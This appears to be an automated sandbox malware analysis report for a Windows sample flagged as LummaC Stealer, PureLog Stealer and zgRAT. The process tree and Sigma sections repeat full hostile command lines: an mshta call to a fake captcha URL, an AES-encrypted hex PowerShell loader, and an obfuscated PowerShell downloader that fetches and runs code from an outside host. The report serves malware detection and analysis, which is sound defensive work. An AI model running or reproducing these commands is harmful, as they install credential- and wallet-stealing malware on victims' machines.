Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1579343
Infos:

Detection

LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7300 cmdline: cmd /C ""C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7356 cmdline: "C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D71017DA8A8FE9CCBCC76E3BA3B6A95D1ED2A4A44A168E8636A1C900DADF3286F3ED2FDAD098EE58C7B6AFCCBC68203649484FF462A21AD9EE06F0B2A24495E62A40046DF6C39B77D47A014F0F0940CF765920FB7FA754DFE80F9D4138A2328D4A2F3909905D737350CA18D46A3F34F72969F4026F528EE194317064AC8ABF90F0C562A82D0FB23D49696F85E3A60A4C23E6FC2E69C0C21061968D1E083A7DC8FB925B87086B50A6B6A111CCAA936B945BCCF1B61BA45851312BC53A436D6FD6E88D4E39E965D4CBE982D9E2C56EB4D9900');$wBTv=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((ERrXH('6B635876677359704D536E5770724B42')),[byte[]]::new(16)).TransformFinalBlock($ZMcko,0,$ZMcko.Length)); & $wBTv.Substring(0,3) $wBTv.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7692 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7704 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.2813404644.000000000D3E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000006.00000002.2722035542.0000000007890000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: powershell.exe PID: 7572INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x1cff4:$b1: ::WriteAllBytes(
          • 0x1d8d5:$b1: ::WriteAllBytes(
          • 0x83716:$b1: ::WriteAllBytes(
          • 0x84587:$b1: ::WriteAllBytes(
          • 0x1d0a8:$s1: -join
          • 0x1d989:$s1: -join
          • 0x33be3:$s1: -join
          • 0x3c18f:$s1: -join
          • 0x3cfb0:$s1: -join
          • 0x5c3cf:$s1: -join
          • 0x5d1f0:$s1: -join
          • 0x6233c:$s1: -join
          • 0x63905:$s1: -join
          • 0x7daf3:$s1: -join
          • 0x7e7a9:$s1: -join
          • 0x837ca:$s1: -join
          • 0x8463b:$s1: -join
          • 0x85581:$s1: -join
          • 0x863a2:$s1: -join
          • 0x89134:$s1: -join
          • 0x89f64:$s1: -join
          Process Memory Space: powershell.exe PID: 7692INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x59c090:$b2: ::FromBase64String(
          • 0xb3b47d:$b2: ::FromBase64String(
          • 0x59bca4:$s1: -join
          • 0xb1e8aa:$s1: -join
          • 0xb3b091:$s1: -join
          • 0xb62bb7:$s1: -join
          • 0xb6fc8c:$s1: -join
          • 0xb7305e:$s1: -join
          • 0xb73710:$s1: -join
          • 0xb75201:$s1: -join
          • 0xb77407:$s1: -join
          • 0xb77c2e:$s1: -join
          • 0xb7849e:$s1: -join
          • 0xb78bd9:$s1: -join
          • 0xb78c0b:$s1: -join
          • 0xb78c53:$s1: -join
          • 0xb78c72:$s1: -join
          • 0xb794c2:$s1: -join
          • 0xb7963e:$s1: -join
          • 0xb796b6:$s1: -join
          • 0xb79749:$s1: -join

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.powershell.exe.7890000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            6.2.powershell.exe.d461e90.2.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              6.2.powershell.exe.d461e90.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                6.2.powershell.exe.d461e90.2.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  6.2.powershell.exe.d461e90.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34E